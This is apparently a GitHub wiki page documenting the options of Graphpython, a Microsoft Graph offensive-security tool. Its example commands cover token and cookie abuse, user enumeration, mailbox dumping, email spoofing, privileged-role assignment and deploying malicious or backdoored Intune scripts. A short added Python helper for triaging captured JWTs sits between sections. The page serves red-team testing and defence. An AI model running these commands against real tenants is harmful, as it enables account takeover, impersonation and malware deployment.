mc edited this page Jul 24, 2024 · 22 revisions

This page documents the available options for Graphpython.

usage: Graphpython [-h] [--command COMMAND] [--list-commands] [--token TOKEN] [--estsauthcookie ESTSAUTHCOOKIE] [--use-cae] [--cert CERT]
                   [--domain DOMAIN] [--tenant TENANT] [--username USERNAME] [--secret SECRET] [--id ID] [--select SELECT] [--query QUERY]
                   [--search SEARCH] [--entity {driveItem,message,chatMessage,site,event}] [--device {Mac,Windows,AndroidMobile,iPhone}]
                   [--browser {Android,IE,Chrome,Firefox,Edge,Safari}] [--only-return-cookies]
                   [--mail-folder {Allitems,inbox,archive,drafts,sentitems,deleteditems,recoverableitemsdeletions}] [--top TOP]
                   [--script SCRIPT] [--email EMAIL]

General

  • -h, --help

    • Show the help message and exit.
    Graphpython -h
  • --command COMMAND

    • Specify the command to execute.
    Graphpython --command list-users
  • --list-commands

    • List all available commands.
    Graphpython --list-commands

Authentication

  • --token TOKEN

    • Provide a Microsoft Graph access token or refresh token for FOCI abuse.
    Graphpython --token YOUR_ACCESS_TOKEN
  • --estsauthcookie ESTSAUTHCOOKIE

    • Use an 'ESTSAuth' or 'ESTSAuthPersistent' cookie for authentication.
    Graphpython --estsauthcookie YOUR_COOKIE
  • --use-cae

    • Enable Continuous Access Evaluation (CAE). This adds 'cp1' as a client claim to obtain an access token valid for 24 hours.
    Graphpython --use-cae
  • --username USERNAME

    • Provide a username or a file containing usernames for user enumeration as an outsider.
    Graphpython --username user@example.com
  • --cert CERT

    • Path to an X509Certificate (.pfx file).
    Graphpython --cert /path/to/certificate.pfx
  • --domain DOMAIN

    • Specify the target domain.
    Graphpython --domain example.com
  • --tenant TENANT

    • Specify the target tenant ID.
    Graphpython --tenant YOUR_TENANT_ID
  • --secret SECRET

    • Enterprise application client secret used to obtain an access token (used with the invoke-appsecrettoaccesstoken command).
    Graphpython --secret YOUR_SECRET
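Tokens obtained with --token or --use-cae are JWTs, so their lifetime and capability claims can be inspected offline. The following is an added triage helper for defenders reviewing a recovered token; it is not part of Graphpython or this wiki. It assumes that a CAE-capable token exposes the 'cp1' capability in an xms_cc claim and that a lifetime well beyond the usual ~1 hour is worth flagging; the sample tokens are constructed and unsigned, and no signature is verified.

```python
import base64
import json
from datetime import datetime, timezone


def _b64url_decode(segment: str) -> bytes:
    """Decode one base64url JWT segment, restoring the '=' padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(data: bytes) -> str:
    """base64url-encode without padding, as compact JWS does."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def decode_jwt_claims(token: str) -> dict:
    """Return the claim set of a compact JWT without checking its signature.

    This is triage of a token already in hand, not validation of a token
    presented to a service: never accept claims from an unverified token.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected compact JWS form header.payload.signature")
    return json.loads(_b64url_decode(parts[1]))


def triage_token(token: str) -> dict:
    """Summarise the facts an incident responder wants from a Graph token."""
    claims = decode_jwt_claims(token)
    iat, exp = int(claims["iat"]), int(claims["exp"])
    lifetime_h = (exp - iat) / 3600
    capabilities = claims.get("xms_cc", [])  # assumption: client capabilities live here
    return {
        "audience": claims.get("aud"),
        "scopes": claims.get("scp", "").split(),
        "lifetime_hours": round(lifetime_h, 2),
        "cae_capable": "cp1" in capabilities,
        # ordinary Graph access tokens last about an hour; the page states CAE
        # tokens are valid for 24 hours, so anything past 2h is flagged
        "long_lived": lifetime_h > 2,
        "expires_utc": datetime.fromtimestamp(exp, tz=timezone.utc).isoformat(),
    }


def make_sample_token(claims: dict) -> str:
    """Build a constructed, unsigned sample token for offline testing only."""
    header = {"alg": "none", "typ": "JWT"}
    signature = _b64url_encode(b"not-a-real-signature")  # placeholder, never valid
    return ".".join([
        _b64url_encode(json.dumps(header).encode()),
        _b64url_encode(json.dumps(claims).encode()),
        signature,
    ])


# Constructed claim sets: one CAE-capable 24h token, one ordinary 65-minute token.
_ISSUED_AT = 1721800000
CAE_SAMPLE_CLAIMS = {
    "aud": "https://graph.microsoft.com",
    "iat": _ISSUED_AT,
    "exp": _ISSUED_AT + 24 * 3600,
    "scp": "Mail.Read User.Read",
    "xms_cc": ["cp1"],
}
SHORT_SAMPLE_CLAIMS = {
    "aud": "https://graph.microsoft.com",
    "iat": _ISSUED_AT,
    "exp": _ISSUED_AT + 3900,
    "scp": "User.Read",
}


if __name__ == "__main__":
    for name, claims in (("cae", CAE_SAMPLE_CLAIMS), ("short", SHORT_SAMPLE_CLAIMS)):
        print(name, json.dumps(triage_token(make_sample_token(claims)), indent=2))
```

Run it on a real token by passing the string to triage_token; a result with cae_capable and long_lived both true is the 24-hour case this page describes and is the one to prioritise for revocation.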

Target

  • --id ID

    • ID of the target object.
    Graphpython --id OBJECT_ID
  • --select SELECT

    • Specify fields to select from the output.
    Graphpython --select id,displayName
  • --query QUERY

    • Raw API query URL (GET only).
    Graphpython --query https://graph.microsoft.com/v1.0/users
  • --search SEARCH

    • Search string to query for.
    Graphpython --search "John Doe"

Entities

  • --entity {driveItem,message,chatMessage,site,event}

    • Specify the type of entity to search for:
      • driveItem: OneDrive items
      • message: Mail messages
      • chatMessage: Teams chat messages
      • site: SharePoint sites
      • event: Calendar events
    Graphpython --entity message

User-Agents

  • --device {Mac,Windows,AndroidMobile,iPhone}

    • Specify the device type for User-Agent forging.
    Graphpython --device Windows
  • --browser {Android,IE,Chrome,Firefox,Edge,Safari}

    • Specify the browser type for User-Agent forging.
    Graphpython --browser Chrome
  • --only-return-cookies

    • Only return cookies from the request (used with the open-owamailboxinbrowser command).
    Graphpython --only-return-cookies

Mail

  • --mail-folder {Allitems,inbox,archive,drafts,sentitems,deleteditems,recoverableitemsdeletions}

    • Specify the mail folder to dump using the dump-owamailbox command.
    Graphpython --mail-folder inbox
  • --top TOP

    • Number of messages to retrieve (integer).
    Graphpython --top 50

Payloads

  • --script SCRIPT

    • File containing the script content for the deploy-maliciousscript or backdoor-script commands.
    Graphpython --script /path/to/script.ps1
  • --email EMAIL

    • File containing the OWA email message body content for the spoof-owaemailmessage command.
    Graphpython --email /path/to/email.txt

Examples

Graphpython --command invoke-reconasoutsider --domain company.com
Graphpython --command invoke-userenumerationasoutsider --username <email@company.com/emails.txt>
Graphpython --command get-graphtokens --use-cae
Graphpython --command invoke-refreshtoazuremanagementtoken --tenant <tenant-id> --token refresh-token --use-cae
Graphpython --command get-users --token eyJ0... --select displayname,id [--id <userid>]
Graphpython --command list-recentonedrivefiles --token token
Graphpython --command invoke-search --search "credentials" --entity driveItem --token token
Graphpython --command invoke-customquery --query https://graph.microsoft.com/v1.0/sites/{siteId}/drives --token token
Graphpython --command assign-privilegedrole --token token
Graphpython --command spoof-owaemailmessage [--id <userid to spoof>] --token token --email email-body.txt
Graphpython --command get-manageddevices --token intune-token
Graphpython --command deploy-maliciousscript --script malicious.ps1 --token token
Graphpython --command backdoor-script --id <scriptid> --script backdoored-script.ps1 --token token
Graphpython --command add-exclusiongrouptopolicy --id <policyid> --token token
Graphpython --command reboot-device --id <deviceid> --token eyJ0...